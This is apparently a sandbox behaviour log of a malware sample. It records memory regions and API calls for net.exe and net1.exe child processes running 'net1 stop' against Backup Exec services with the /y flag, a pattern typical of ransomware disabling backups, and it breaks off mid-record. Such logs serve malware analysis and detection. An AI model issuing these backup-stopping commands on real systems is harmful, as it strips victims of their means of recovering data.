start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5155 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5156 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5157 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 5158 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5159 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5160 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5161 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5162 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5163 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5164 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 5165 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5166 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 5167 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5168 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 504 os_tid = 0x1204 Process: id = "104" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6d0e8000" os_pid = "0x1220" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "99" os_parent_pid = "0x119c" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5189 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5190 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5191 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5192 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5193 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5194 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5195 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5196 start_va = 0xff9d0000 end_va = 0xffa02fff entry_point = 0xff9d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5197 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5198 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5199 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5200 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5201 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5202 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5203 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5204 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5205 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5206 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5207 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 5208 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 5209 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5210 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5211 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5212 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5213 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5214 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5215 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5216 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5217 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5218 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5219 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5220 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5221 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5222 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5223 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5224 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5225 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5226 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5280 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 506 os_tid = 0x1224 [0090.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf7b0 | out: lpSystemTimeAsFileTime=0xcf7b0*(dwLowDateTime=0xeb3278b0, dwHighDateTime=0x1d48689)) [0090.645] GetCurrentProcessId () returned 0x1220 [0090.645] GetCurrentThreadId () returned 0x1224 [0090.645] GetTickCount () returned 0x207fb [0090.645] QueryPerformanceCounter (in: lpPerformanceCount=0xcf7b8 | out: lpPerformanceCount=0xcf7b8*=1813756300000) returned 1 [0090.647] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000 [0090.647] __set_app_type (_Type=0x1) [0090.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9e9c9c) returned 0x0 [0090.647] __getmainargs (in: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788, _DoWildCard=0, _StartInfo=0xff9f479c | out: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788) returned 0 [0090.647] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.647] GetConsoleOutputCP () returned 0x1b5 [0090.647] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9fcec0 | out: lpCPInfo=0xff9fcec0) returned 1 [0090.647] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.649] sprintf_s (in: _DstBuf=0xcf758, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0090.649] setlocale (category=0, locale=".437") returned="English_United States.437" [0090.650] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0090.650] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.650] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" [0090.809] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf4f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0090.809] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0090.809] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf748 | out: Buffer=0xcf748*=0x214d60) returned 0x0 [0090.809] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf748 | out: Buffer=0xcf748*=0x21c130) returned 0x0 [0090.809] _fileno (_File=0x7fefdba2a80) returned 0 [0090.810] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0090.810] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0090.810] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0090.810] _wcsicmp (_String1="config", _String2="stop") returned -16 [0090.810] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0090.810] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0090.810] _wcsicmp (_String1="file", _String2="stop") returned -13 [0090.810] _wcsicmp (_String1="files", _String2="stop") returned -13 [0090.810] _wcsicmp (_String1="group", _String2="stop") returned -12 [0090.810] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0090.810] _wcsicmp (_String1="help", _String2="stop") returned -11 [0090.810] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0090.810] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0090.810] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0090.810] _wcsicmp (_String1="session", _String2="stop") returned -15 [0090.810] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0090.810] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0090.810] _wcsicmp (_String1="share", _String2="stop") returned -12 [0090.810] _wcsicmp (_String1="start", _String2="stop") returned -14 [0090.810] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0090.810] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0090.810] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0090.810] _wcsicmp (_String1="accounts", _String2="BackupExecRPCService") returned -1 [0090.810] _wcsicmp (_String1="computer", _String2="BackupExecRPCService") returned 1 [0090.810] _wcsicmp (_String1="config", _String2="BackupExecRPCService") returned 1 [0090.810] _wcsicmp (_String1="continue", _String2="BackupExecRPCService") returned 1 [0090.810] _wcsicmp (_String1="cont", _String2="BackupExecRPCService") returned 1 [0090.810] _wcsicmp (_String1="file", _String2="BackupExecRPCService") returned 4 [0090.810] _wcsicmp (_String1="files", _String2="BackupExecRPCService") returned 4 [0090.810] _wcsicmp (_String1="group", _String2="BackupExecRPCService") returned 5 [0090.810] _wcsicmp (_String1="groups", _String2="BackupExecRPCService") returned 5 [0090.810] _wcsicmp (_String1="help", _String2="BackupExecRPCService") returned 6 [0090.810] _wcsicmp (_String1="helpmsg", _String2="BackupExecRPCService") returned 6 [0090.810] _wcsicmp (_String1="localgroup", _String2="BackupExecRPCService") returned 10 [0090.810] _wcsicmp (_String1="pause", _String2="BackupExecRPCService") returned 14 [0090.810] _wcsicmp (_String1="session", _String2="BackupExecRPCService") returned 17 [0090.810] _wcsicmp (_String1="sessions", _String2="BackupExecRPCService") returned 17 [0090.810] _wcsicmp (_String1="sess", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="share", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="start", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="stats", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="statistics", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="stop", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="time", _String2="BackupExecRPCService") returned 18 [0090.811] _wcsicmp (_String1="user", _String2="BackupExecRPCService") returned 19 [0090.811] _wcsicmp (_String1="users", _String2="BackupExecRPCService") returned 19 [0090.811] _wcsicmp (_String1="msg", _String2="BackupExecRPCService") returned 11 [0090.811] _wcsicmp (_String1="messenger", _String2="BackupExecRPCService") returned 11 [0090.811] _wcsicmp (_String1="receiver", _String2="BackupExecRPCService") returned 16 [0090.811] _wcsicmp (_String1="rcv", _String2="BackupExecRPCService") returned 16 [0090.811] _wcsicmp (_String1="netpopup", _String2="BackupExecRPCService") returned 12 [0090.811] _wcsicmp (_String1="redirector", _String2="BackupExecRPCService") returned 16 [0090.811] _wcsicmp (_String1="redir", _String2="BackupExecRPCService") returned 16 [0090.811] _wcsicmp (_String1="rdr", _String2="BackupExecRPCService") returned 16 [0090.811] _wcsicmp (_String1="workstation", _String2="BackupExecRPCService") returned 21 [0090.811] _wcsicmp (_String1="work", _String2="BackupExecRPCService") returned 21 [0090.811] _wcsicmp (_String1="wksta", _String2="BackupExecRPCService") returned 21 [0090.811] _wcsicmp (_String1="prdr", _String2="BackupExecRPCService") returned 14 [0090.811] _wcsicmp (_String1="devrdr", _String2="BackupExecRPCService") returned 2 [0090.811] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecRPCService") returned 10 [0090.811] _wcsicmp (_String1="server", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="svr", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="srv", _String2="BackupExecRPCService") returned 17 [0090.811] _wcsicmp (_String1="lanmanserver", _String2="BackupExecRPCService") returned 10 [0090.811] _wcsicmp (_String1="alerter", _String2="BackupExecRPCService") returned -1 [0090.811] _wcsicmp (_String1="netlogon", _String2="BackupExecRPCService") returned 12 [0090.811] _wcsupr (in: _String="BackupExecRPCService" | out: _String="BACKUPEXECRPCSERVICE") returned="BACKUPEXECRPCSERVICE" [0090.811] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x21ce40 [0090.814] GetServiceKeyNameW (in: hSCManager=0x21ce40, lpDisplayName="BACKUPEXECRPCSERVICE", lpServiceName=0xff9f5750, lpcchBuffer=0xcf668 | out: lpServiceName="", lpcchBuffer=0xcf668) returned 0 [0090.815] _wcsicmp (_String1="msg", _String2="BACKUPEXECRPCSERVICE") returned 11 [0090.815] _wcsicmp (_String1="messenger", _String2="BACKUPEXECRPCSERVICE") returned 11 [0090.815] _wcsicmp (_String1="receiver", _String2="BACKUPEXECRPCSERVICE") returned 16 [0090.815] _wcsicmp (_String1="rcv", _String2="BACKUPEXECRPCSERVICE") returned 16 [0090.815] _wcsicmp (_String1="redirector", _String2="BACKUPEXECRPCSERVICE") returned 16 [0090.815] _wcsicmp (_String1="redir", _String2="BACKUPEXECRPCSERVICE") returned 16 [0090.815] _wcsicmp (_String1="rdr", _String2="BACKUPEXECRPCSERVICE") returned 16 [0090.815] _wcsicmp (_String1="workstation", _String2="BACKUPEXECRPCSERVICE") returned 21 [0090.815] _wcsicmp (_String1="work", _String2="BACKUPEXECRPCSERVICE") returned 21 [0090.815] _wcsicmp (_String1="wksta", _String2="BACKUPEXECRPCSERVICE") returned 21 [0090.815] _wcsicmp (_String1="prdr", _String2="BACKUPEXECRPCSERVICE") returned 14 [0090.815] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECRPCSERVICE") returned 2 [0090.815] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECRPCSERVICE") returned 10 [0090.815] _wcsicmp (_String1="server", _String2="BACKUPEXECRPCSERVICE") returned 17 [0090.815] _wcsicmp (_String1="svr", _String2="BACKUPEXECRPCSERVICE") returned 17 [0090.816] _wcsicmp (_String1="srv", _String2="BACKUPEXECRPCSERVICE") returned 17 [0090.816] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECRPCSERVICE") returned 10 [0090.816] _wcsicmp (_String1="alerter", _String2="BACKUPEXECRPCSERVICE") returned -1 [0090.816] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECRPCSERVICE") returned 12 [0090.816] NetServiceControl (in: servername=0x0, service="BACKUPEXECRPCSERVICE", opcode=0x0, arg=0x0, bufptr=0xcf670 | out: bufptr=0xcf670) returned 0x889 [0090.816] wcscpy_s (in: _Destination=0xff9f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0090.816] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0090.817] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0090.818] GetFileType (hFile=0xb) returned 0x2 [0090.818] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf538 | out: lpMode=0xcf538) returned 1 [0090.818] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf530, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0xcf530*=0x1e) returned 1 [0090.819] GetFileType (hFile=0xb) returned 0x2 [0090.819] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf538 | out: lpMode=0xcf538) returned 1 [0090.819] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf530, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0xcf530*=0x2) returned 1 [0090.819] _ultow (in: _Dest=0x889, _Radix=849312 | out: _Dest=0x889) returned="2185" [0090.819] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0090.819] GetFileType (hFile=0xb) returned 0x2 [0090.819] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf538 | out: lpMode=0xcf538) returned 1 [0090.820] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf530, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0xcf530*=0x34) returned 1 [0090.820] GetFileType (hFile=0xb) returned 0x2 [0090.820] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf538 | out: lpMode=0xcf538) returned 1 [0090.820] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf530, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0xcf530*=0x2) returned 1 [0090.820] NetApiBufferFree (Buffer=0x214d60) returned 0x0 [0090.821] NetApiBufferFree (Buffer=0x21c130) returned 0x0 [0090.821] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" [0090.821] exit (_Code=2) Process: id = "105" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6507e000" os_pid = "0x1234" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0x1148" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5227 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5228 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5229 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5230 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5231 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5232 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5233 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5234 start_va = 0xff9d0000 end_va = 0xffa02fff entry_point = 0xff9d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5235 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5236 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5237 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 5238 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5239 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 5240 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5241 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5242 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5243 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5244 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5245 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 5246 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5247 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5248 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5249 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5250 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5251 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5252 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5253 start_va = 